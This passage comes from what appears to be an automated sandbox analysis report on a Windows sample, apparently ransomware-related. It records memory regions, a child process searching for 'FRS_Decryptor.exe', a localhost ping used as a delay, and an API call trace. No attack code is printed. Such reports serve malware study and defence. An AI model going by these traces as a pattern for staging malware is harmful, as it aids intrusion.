"" Region: id = 7075 start_va = 0x890000 end_va = 0x89ffff entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 7076 start_va = 0x8b0000 end_va = 0x9affff entry_point = 0x0 region_type = private name = "private_0x00000000008b0000" filename = "" Region: id = 7077 start_va = 0x9b0000 end_va = 0xb37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009b0000" filename = "" Region: id = 7078 start_va = 0xb40000 end_va = 0xcc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b40000" filename = "" Region: id = 7079 start_va = 0xcd0000 end_va = 0x20cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000cd0000" filename = "" Region: id = 7080 start_va = 0x20d0000 end_va = 0x23a4fff entry_point = 0x20d0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 7081 start_va = 0x23b0000 end_va = 0x27abfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000023b0000" filename = "" Region: id = 7082 start_va = 0x27b0000 end_va = 0x27effff entry_point = 0x0 region_type = private name = "private_0x00000000027b0000" filename = "" Region: id = 7083 start_va = 0x27f0000 end_va = 0x282ffff entry_point = 0x0 region_type = private name = "private_0x00000000027f0000" filename = "" Region: id = 7084 start_va = 0x73430000 end_va = 0x73471fff entry_point = 0x73430000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 7085 start_va = 0x73480000 end_va = 0x734e0fff entry_point = 0x73480000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 7086 start_va = 0x734f0000 end_va = 0x734fbfff entry_point = 0x734f0000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 7087 start_va = 0x73530000 end_va = 0x7353ffff entry_point = 0x73530000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 7088 start_va = 0x73540000 end_va = 0x7355afff entry_point = 0x73540000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 7089 start_va = 0x73560000 end_va = 0x73569fff entry_point = 0x73560000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 7090 start_va = 0x73570000 end_va = 0x736b7fff entry_point = 0x73570000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 7091 start_va = 0x736c0000 end_va = 0x736d1fff entry_point = 0x736c0000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 7092 start_va = 0x73da0000 end_va = 0x73ddcfff entry_point = 0x73da0000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 7093 start_va = 0x73de0000 end_va = 0x73df3fff entry_point = 0x73de0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 7094 start_va = 0x73e10000 end_va = 0x73e18fff entry_point = 0x73e10000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 7095 start_va = 0x73f20000 end_va = 0x73f3cfff entry_point = 0x73f20000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 7096 start_va = 0x73f40000 end_va = 0x73f6efff entry_point = 0x73f40000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 7097 start_va = 0x73f70000 end_va = 0x73f87fff entry_point = 0x73f70000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 7098 start_va = 0x74310000 end_va = 0x74317fff entry_point = 0x74310000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 7099 start_va = 0x745f0000 end_va = 0x745f8fff entry_point = 0x745f0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 7100 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 7101 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 7102 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 7103 start_va = 0x74bc0000 end_va = 0x74d0dfff entry_point = 0x74bc0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 7104 start_va = 0x74d10000 end_va = 0x74d87fff entry_point = 0x74d10000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 7105 start_va = 0x74d90000 end_va = 0x74e16fff entry_point = 0x74d90000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 7106 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 7107 start_va = 0x74ee0000 end_va = 0x74f2cfff entry_point = 0x74ee0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 7108 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7109 start_va = 0x75360000 end_va = 0x75456fff entry_point = 0x75360000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 7110 start_va = 0x75460000 end_va = 0x755aefff entry_point = 0x75460000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 7111 start_va = 0x75700000 end_va = 0x7577cfff entry_point = 0x75700000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 7112 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 7113 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 7114 start_va = 0x76c50000 end_va = 0x76d5bfff entry_point = 0x76c50000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 7115 start_va = 0x76d60000 end_va = 0x76d66fff entry_point = 0x76d60000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 7116 start_va = 0x76d70000 end_va = 0x76db0fff entry_point = 0x76d70000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 7117 start_va = 0x76dc0000 end_va = 0x76de4fff entry_point = 0x76dc0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 7118 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 7119 start_va = 0x76ec0000 end_va = 0x76fc7fff entry_point = 0x76ec0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 7120 start_va = 0x7ecc0000 end_va = 0x7edbffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ecc0000" filename = "" Region: id = 7121 start_va = 0x7ede8000 end_va = 0x7edeafff entry_point = 0x0 region_type = private name = "private_0x000000007ede8000" filename = "" Thread: id = 386 os_tid = 0x2e4 Thread: id = 388 os_tid = 0x9b4 Thread: id = 389 os_tid = 0x4cc Thread: id = 390 os_tid = 0x940 Process: id = "137" image_name = "find.exe" filename = "c:\\windows\\syswow64\\find.exe" page_root = "0x60b01000" os_pid = "0x688" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "135" os_parent_pid = "0x74c" cmd_line = "find /i \"FRS_Decryptor.exe\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7038 start_va = 0x5f0000 end_va = 0x60ffff entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 7039 start_va = 0x610000 end_va = 0x611fff entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 7040 start_va = 0x620000 end_va = 0x62efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 7041 start_va = 0x630000 end_va = 0x66ffff entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 7042 start_va = 0x670000 end_va = 0x6affff entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 7043 start_va = 0x6b0000 end_va = 0x6b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006b0000" filename = "" Region: id = 7044 start_va = 0x6c0000 end_va = 0x6c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006c0000" filename = "" Region: id = 7045 start_va = 0x6d0000 end_va = 0x6d1fff entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 7046 start_va = 0x11c0000 end_va = 0x11c6fff entry_point = 0x11c0000 region_type = mapped_file name = "find.exe" filename = "\\Windows\\SysWOW64\\find.exe" (normalized: "c:\\windows\\syswow64\\find.exe") Region: id = 7047 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 7048 start_va = 0x7ea90000 end_va = 0x7eab2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ea90000" filename = "" Region: id = 7049 start_va = 0x7eab7000 end_va = 0x7eab7fff entry_point = 0x0 region_type = private name = "private_0x000000007eab7000" filename = "" Region: id = 7050 start_va = 0x7eabc000 end_va = 0x7eabefff entry_point = 0x0 region_type = private name = "private_0x000000007eabc000" filename = "" Region: id = 7051 start_va = 0x7eabf000 end_va = 0x7eabffff entry_point = 0x0 region_type = private name = "private_0x000000007eabf000" filename = "" Region: id = 7052 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7053 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 7054 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7055 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 7060 start_va = 0x770000 end_va = 0x77ffff entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 7061 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 7062 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 7063 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Thread: id = 387 os_tid = 0x658 Process: id = "138" image_name = "ping.exe" filename = "c:\\windows\\syswow64\\ping.exe" page_root = "0xfc1e000" os_pid = "0x9c0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "ping -n 3 127.1" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7122 start_va = 0xa0000 end_va = 0xbffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 7123 start_va = 0xc0000 end_va = 0xc1fff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 7124 start_va = 0xd0000 end_va = 0xdefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 7125 start_va = 0xe0000 end_va = 0x11ffff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 7126 start_va = 0x120000 end_va = 0x15ffff entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 7127 start_va = 0x160000 end_va = 0x163fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 7128 start_va = 0x170000 end_va = 0x170fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 7129 start_va = 0x180000 end_va = 0x181fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 7130 start_va = 0x940000 end_va = 0x948fff entry_point = 0x940000 region_type = mapped_file name = "ping.exe" filename = "\\Windows\\SysWOW64\\PING.EXE" (normalized: "c:\\windows\\syswow64\\ping.exe") Region: id = 7131 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 7132 start_va = 0x7f7e0000 end_va = 0x7f802fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f7e0000" filename = "" Region: id = 7133 start_va = 0x7f806000 end_va = 0x7f806fff entry_point = 0x0 region_type = private name = "private_0x000000007f806000" filename = "" Region: id = 7134 start_va = 0x7f80b000 end_va = 0x7f80bfff entry_point = 0x0 region_type = private name = "private_0x000000007f80b000" filename = "" Region: id = 7135 start_va = 0x7f80d000 end_va = 0x7f80ffff entry_point = 0x0 region_type = private name = "private_0x000000007f80d000" filename = "" Region: id = 7136 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7137 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 7138 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7139 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 7140 start_va = 0x310000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 7141 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 7142 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 7143 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 7144 start_va = 0xa0000 end_va = 0xaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 7145 start_va = 0xb0000 end_va = 0xb3fff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 7146 start_va = 0x190000 end_va = 0x20dfff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7147 start_va = 0x450000 end_va = 0x54ffff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 7148 start_va = 0x690000 end_va = 0x69ffff entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 7149 start_va = 0x73db0000 end_va = 0x73db7fff entry_point = 0x73db0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 7150 start_va = 0x73dc0000 end_va = 0x73dddfff entry_point = 0x73dc0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 7151 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 7152 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 7153 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 7154 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 7155 start_va = 0x74ee0000 end_va = 0x74f2cfff entry_point = 0x74ee0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 7156 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7157 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 7158 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 7159 start_va = 0x76d60000 end_va = 0x76d66fff entry_point = 0x76d60000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 7160 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 7161 start_va = 0x7f6e0000 end_va = 0x7f7dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6e0000" filename = "" Region: id = 7162 start_va = 0x210000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 7163 start_va = 0x250000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 7164 start_va = 0x7f808000 end_va = 0x7f80afff entry_point = 0x0 region_type = private name = "private_0x000000007f808000" filename = "" Region: id = 7165 start_va = 0x73690000 end_va = 0x736d4fff entry_point = 0x73690000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 7166 start_va = 0xc0000 end_va = 0xc2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 7167 start_va = 0x290000 end_va = 0x290fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 7168 start_va = 0x2a0000 end_va = 0x2a2fff entry_point = 0x2a0000 region_type = mapped_file name = "ping.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\ping.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\ping.exe.mui") Region: id = 7169 start_va = 0x2b0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 7170 start_va = 0x320000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 7171 start_va = 0x7f6dd000 end_va = 0x7f6dffff entry_point = 0x0 region_type = private name = "private_0x000000007f6dd000" filename = "" Thread: id = 391 os_tid = 0x2fc [0128.106] GetModuleHandleA (lpModuleName=0x0) returned 0x940000 [0128.106] __set_app_type (_Type=0x1) [0128.106] __p__fmode () returned 0x76ea1768 [0128.106] __p__commode () returned 0x76ea176c [0128.106] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x943229) returned 0x0 [0128.106] __wgetmainargs (in: _Argc=0x9440c8, _Argv=0x9440cc, _Env=0x9440d0, _DoWildCard=0, _StartInfo=0x9440dc | out: _Argc=0x9440c8, _Argv=0x9440cc, _Env=0x9440d0) returned 0 [0128.106] SetThreadUILanguage (LangId=0x0) returned 0x409 [0128.108] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0128.108] _fileno (_File=0x76ea4c28) returned 1 [0128.108] _get_osfhandle (_FileHandle=1) returned 0x28 [0128.108] GetFileType (hFile=0x28) returned 0x2 [0128.108] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x15ef40 | out: lpMode=0x15ef40) returned 0 [0128.108] GetLastError () returned 0x6 [0128.108] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x15eea4, nSize=0x50 | out: lpBuffer="䤐E") returned 0x0 [0128.108] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x945500 | out: lpWSAData=0x945500) returned 0 [0128.110] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x1, phkResult=0x15ef5c | out: phkResult=0x15ef5c*=0x88) returned 0x0 [0128.110] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultTTL", lpReserved=0x0, lpType=0x15ef50, lpData=0x15ef58, lpcbData=0x15ef54*=0x4 | out: lpType=0x15ef50*=0x0, lpData=0x15ef58*=0x0, lpcbData=0x15ef54*=0x4) returned 0x2 [0128.110] RegCloseKey (hKey=0x88) returned 0x0 [0128.110] GetAddrInfoW (in: pNodeName="127.1", pServiceName=0x0, pHints=0x15ef20*(ai_flags=4, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x15ef5c | out: ppResult=0x15ef5c*=0x45c138*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x458928*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0)) returned 0 [0128.110] FreeAddrInfoW (pAddrInfo=0x45c138*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x458928*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0)) [0128.110] IcmpCreateFile () returned 0x456a68 [0128.113] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x45c2c8 [0128.113] LocalAlloc (uFlags=0x0, uBytes=0x1ff8) returned 0x465270 [0128.113] GetNameInfoW (in: pSockaddr=0x945480*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), SockaddrLength=0x10, pNodeBuffer=0x15f058, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.1", pServiceBuffer=0x0) returned 0 [0128.114] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274b, dwLanguageId=0x0, lpBuffer=0x15ef50, nSize=0x0, Arguments=0x15ef4c | out: lpBuffer="竈F襤\x15┗\x94䰨盪❋") returned 0x14 [0128.115] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0128.115] _fileno (_File=0x76ea4c28) returned 1 [0128.115] _get_osfhandle (_FileHandle=1) returned 0x28 [0128.115] GetFileType (hFile=0x28) returned 0x2 [0128.115] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x15ef14 | out: lpMode=0x15ef14) returned 0 [0128.115] GetLastError () returned 0x6 [0128.115] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x15ee78, nSize=0x50 | out: lpBuffer="\x15❋") returned 0x0 [0128.115] _fileno (_File=0x76ea4c28) returned 1 [0128.115] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0128.115] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging 127.0.0.1 ", cchWideChar=-1, 